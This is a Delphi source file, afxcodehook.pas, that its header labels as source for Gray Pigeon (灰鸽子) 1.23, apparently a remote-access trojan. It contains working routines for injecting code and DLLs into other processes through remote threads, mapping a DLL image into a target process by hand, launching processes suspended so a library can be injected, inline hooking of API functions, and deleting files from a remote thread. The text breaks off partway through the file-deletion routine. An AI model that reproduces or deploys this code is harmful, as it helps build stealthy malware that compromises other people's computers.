afxcodehook.pas

灰鸽子1.23源码,,,,,,,

  BytesWritten: longword;
begin
  Result := VirtualAllocEx(Process, nil, Len, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(Process, Result, Memory, Len, BytesWritten);
end;

function InjectThread(Process: longword; Thread: pointer; Info: pointer; InfoLen: longword; Results: boolean): THandle;
var
  pThread, pInfo: pointer;
  BytesRead, TID: longword;
begin
  pInfo := InjectMemory(Process, Info, InfoLen);
  pThread := InjectMemory(Process, Thread, SizeOfProc(Thread));
  Result := CreateRemoteThread(Process, nil, 0, pThread, pInfo, 0, TID);
  if Results then
  begin
    WaitForSingleObject(Result, INFINITE);
    ReadProcessMemory(Process, pInfo, Info, InfoLen, BytesRead);
  end;
end;

function InjectLibrary(Process: LongWord; ModulePath: string): boolean;
type
  TInjectLibraryInfo = record
    pLoadLibrary: pointer;
    lpModuleName: pointer;
  end;
var
  InjectLibraryInfo: TInjectLibraryInfo;
  Thread: THandle;

  procedure InjectLibraryThread(lpParameter: pointer); stdcall;
  var
    InjectLibraryInfo: TInjectLibraryInfo;
  begin
    InjectLibraryInfo := TInjectLibraryInfo(lpParameter^);
    asm
      push InjectLibraryInfo.lpModuleName
      call InjectLibraryInfo.pLoadLibrary
    end;
  end;

begin
  Result := False;
  InjectLibraryInfo.pLoadLibrary := GetProcAddress(GetModuleHandle('kernel32'), 'LoadLibraryA');
  InjectLibraryInfo.lpModuleName := InjectString(Process, pchar(ModulePath));
  Thread := InjectThread(Process, @InjectLibraryThread, @InjectLibraryInfo, SizeOf(TInjectLibraryInfo), False);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
  Sleep(100);
end;

function InjectLibrary(Process: LongWord; Src: pointer): boolean;
type
  TDllLoadInfo = record
    Module: pointer;
    EntryPoint: pointer;
  end;
var
  Lib: TLibInfo;
  DllLoadInfo: TDllLoadInfo;
  BytesWritten: longword;
  ImageNtHeaders: PImageNtHeaders;
  pModule: pointer;
  Offset: longword;

  procedure DllEntryPoint(lpParameter: pointer); stdcall;
  var
    LoadInfo: TDllLoadInfo;
  begin
    LoadInfo := TDllLoadInfo(lpParameter^);
    asm
      xor eax, eax
      push eax
      push DLL_PROCESS_ATTACH
      push LoadInfo.Module
      call LoadInfo.EntryPoint
    end;
  end;

begin
  Result := False;
  ImageNtHeaders := pointer(int64(cardinal(Src)) + PImageDosHeader(Src)._lfanew);
  Offset := $10000000;
  repeat
    Inc(Offset, $10000);
    pModule := VirtualAlloc(pointer(ImageNtHeaders.OptionalHeader.ImageBase + Offset), ImageNtHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if pModule <> nil then
    begin
      VirtualFree(pModule, 0, MEM_RELEASE);
      pModule := VirtualAllocEx(Process, pointer(ImageNtHeaders.OptionalHeader.ImageBase + Offset), ImageNtHeaders.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    end;
  until ((pModule <> nil) or (Offset > $30000000));
  Lib := MapLibrary(Process, pModule, Src);
  if Lib.ImageBase = nil then Exit;
  DllLoadInfo.Module := Lib.ImageBase;
  DllLoadInfo.EntryPoint := Lib.DllProcAddress;
  WriteProcessMemory(Process, pModule, Lib.ImageBase, Lib.ImageSize, BytesWritten);
  if InjectThread(Process, @DllEntryPoint, @DllLoadInfo, SizeOf(TDllLoadInfo), False) <> 0 then Result := True
end;

function InjectExe(Process: LongWord; EntryPoint: pointer): boolean;
var
  Module, NewModule: pointer;
  Size, TID: longword;
begin
  Result := False;
  Module := pointer(GetModuleHandle(nil));
  Size := PImageOptionalHeader(pointer(integer(Module) + PImageDosHeader(Module)._lfanew + SizeOf(longword) + SizeOf(TImageFileHeader))).SizeOfImage;
  VirtualFreeEx(Process, Module, 0, MEM_RELEASE);
  NewModule := InjectMemory(Process, Module, Size);
  if CreateRemoteThread(Process, nil, 0, EntryPoint, NewModule, 0, TID) <> 0 then Result := True;
end;

function UninjectLibrary(Process: LongWord; ModulePath: string): boolean;
type
  TUninjectLibraryInfo = record
    pFreeLibrary: pointer;
    pGetModuleHandle: pointer;
    lpModuleName: pointer;
    pExitThread: pointer;
  end;
var
  UninjectLibraryInfo: TUninjectLibraryInfo;
  Thread: THandle;

  procedure UninjectLibraryThread(lpParameter: pointer); stdcall;
  var
    UninjectLibraryInfo: TUninjectLibraryInfo;
  begin
    UninjectLibraryInfo := TUninjectLibraryInfo(lpParameter^);
    asm
      @1:
      inc ecx
      push UninjectLibraryInfo.lpModuleName
      call UninjectLibraryInfo.pGetModuleHandle
      cmp eax, 0
      je @2
      push eax
      call UninjectLibraryInfo.pFreeLibrary
      jmp @1
      @2:
      push eax
      call UninjectLibraryInfo.pExitThread
    end;
  end;

begin
  Result := False;
  UninjectLibraryInfo.pGetModuleHandle := GetProcAddress(GetModuleHandle('kernel32'), 'GetModuleHandleA');
  UninjectLibraryInfo.pFreeLibrary := GetProcAddress(GetModuleHandle('kernel32'), 'FreeLibrary');
  UninjectLibraryInfo.pExitThread := GetProcAddress(GetModuleHandle('kernel32'), 'ExitThread');
  UninjectLibraryInfo.lpModuleName := InjectString(Process, pchar(ModulePath));
  Thread := InjectThread(Process, @UninjectLibraryThread, @UninjectLibraryInfo, SizeOf(TUninjectLibraryInfo), False);
  if Thread = 0 then Exit;
  CloseHandle(Thread);
  Result := True;
end;

function CreateProcessEx(lpApplicationName: pchar; lpCommandLine: pchar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: boolean; dwCreationFlags: longword; lpEnvironment: pointer; lpCurrentDirectory: pchar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation; ModulePath: string): boolean;
type
  TMainThreadInfo = record
    pSleep: pointer;
  end;
var
  MainThreadInfo: TMainThreadInfo;

  procedure MainThread(lpParameter: pointer); stdcall;
  var
    MainThreadInfo: TMainThreadInfo;
  begin
    MainThreadInfo := TMainThreadInfo(lpParameter^);
    asm
      @noret:
      push 1000
      call MainThreadInfo.pSleep
      jmp @noret
    end;
  end;

begin
  Result := False;
  if not CreateProcess(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation) then Exit;
  MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
  InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
  Result := InjectLibrary(lpProcessInformation.hProcess, ModulePath);
  ResumeThread(lpProcessInformation.hThread);
end;

function CreateProcessEx(lpApplicationName: pchar; lpCommandLine: pchar; lpProcessAttributes, lpThreadAttributes: PSecurityAttributes; bInheritHandles: boolean; dwCreationFlags: longword; lpEnvironment: pointer; lpCurrentDirectory: pchar; const lpStartupInfo: TStartupInfo; var lpProcessInformation: TProcessInformation; Src: pointer): boolean;
type
  TMainThreadInfo = record
    pSleep: pointer;
  end;
var
  MainThreadInfo: TMainThreadInfo;

  procedure MainThread(lpParameter: pointer); stdcall;
  var
    MainThreadInfo: TMainThreadInfo;
  begin
    MainThreadInfo := TMainThreadInfo(lpParameter^);
    asm
      @noret:
      push 1000
      call MainThreadInfo.pSleep
      jmp @noret
    end;
  end;

begin
  Result := False;
  if not CreateProcess(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes, bInheritHandles, dwCreationFlags or CREATE_SUSPENDED, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation) then Exit;
  MainThreadInfo.pSleep := GetProcAddress(GetModuleHandle('kernel32'), 'Sleep');
  InjectThread(lpProcessInformation.hProcess, @MainThread, @MainThreadInfo, SizeOf(TMainThreadInfo), False);
  Result := InjectLibrary(lpProcessInformation.hProcess, Src);
  ResumeThread(lpProcessInformation.hThread);
end;

function HookCode(TargetProc, NewProc: pointer; var OldProc: pointer): boolean;
var
  Address: longword;
  OldProtect: longword;
  OldFunction: pointer;
  Proc: pointer;
begin
  Result := False;
  try
    Proc := TargetProc;
    Address := longword(NewProc) - longword(Proc) - 5;
    VirtualProtect(Proc, 5, PAGE_EXECUTE_READWRITE, OldProtect);
    GetMem(OldFunction, 255);
    longword(OldFunction^) := longword(Proc);
    byte(pointer(longword(OldFunction) + 4)^) := SaveOldFunction(Proc, pointer(longword(OldFunction) + 5));
    byte(pointer(Proc)^) := $e9;
    longword(pointer(longword(Proc) + 1)^) := Address;
    VirtualProtect(Proc, 5, OldProtect, OldProtect);
    OldProc := pointer(longword(OldFunction) + 5);
  except
    Exit;
  end;
  Result := True;
end;

function UnhookCode(OldProc: pointer): boolean;
var
  OldProtect: longword;
  Proc: pointer;
  SaveSize: longword;
begin
  Result := True;
  try
    Proc := pointer(longword(pointer(longword(OldProc) - 5)^));
    SaveSize := byte(pointer(longword(OldProc) - 1)^);
    VirtualProtect(Proc, 5, PAGE_EXECUTE_READWRITE, OldProtect);
    CopyMemory(Proc, OldProc, SaveSize);
    VirtualProtect(Proc, 5, OldProtect, OldProtect);
    FreeMem(pointer(longword(OldProc) - 5));
  except
    Result := False;
  end;
end;

function DeleteFileEx(FilePath: pchar): boolean;
type
  TDeleteFileExInfo = record
    pSleep: pointer;
    lpModuleName: pointer;
    pDeleteFile: pointer;
    pExitThread: pointer;
  end;
var
  DeleteFileExInfo: TDeleteFileExInfo;
  Thread: THandle;
  Process: longword;
  PID: longword;

  procedure DeleteFileExThread(lpParameter: pointer); stdcall;
  var
    DeleteFileExInfo: TDeleteFileExInfo;
  begin
    DeleteFileExInfo := TDeleteFileExInfo(lpParameter^);
    asm
      @1:
      push 1000
      call DeleteFileExInfo.pSleep
      push DeleteFileExInfo.lpModuleName
      call DeleteFileExInfo.pDeleteFile
      cmp eax, 0
      je @1
      push eax